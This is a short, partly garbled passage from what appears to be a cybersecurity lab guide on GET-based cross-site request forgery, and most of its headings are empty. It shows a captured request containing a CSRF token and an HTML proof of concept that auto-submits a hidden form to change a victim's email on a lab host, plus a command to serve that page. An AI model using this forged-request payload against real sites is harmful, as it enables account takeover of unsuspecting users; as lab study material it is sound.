Cross-Site Request Forgery (GET-based)
π Understanding CSRF Token Vulnerabilities
π§ͺ Testing for CSRF Token Vulnerabilities
GET /app/save/[email protected][email protected]&telephone=(227)-750-8112&country=CSRF_POC&action=save&csrf=30e7912d04c957022a6d3072be8ef67e52eda8f2htmlCopy Code<html> <body> <form id="submitMe" action="http://csrf.htb.net/app/save/[email protected]" method="GET"> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="telephone" value="(227)-750-8112" /> <input type="hidden" name="country" value="CSRF_POC" /> <input type="hidden" name="action" value="save" /> <input type="hidden" name="csrf" value="30e7912d04c957022a6d3072be8ef67e52eda8f2" /> <input type="submit" value="Submit request" /> </form> <script> document.getElementById("submitMe").submit() </script> </body> </html>python -m http.server 1337
π Example of a CSRF Token Attack
π Resources for Further Learning
Last updated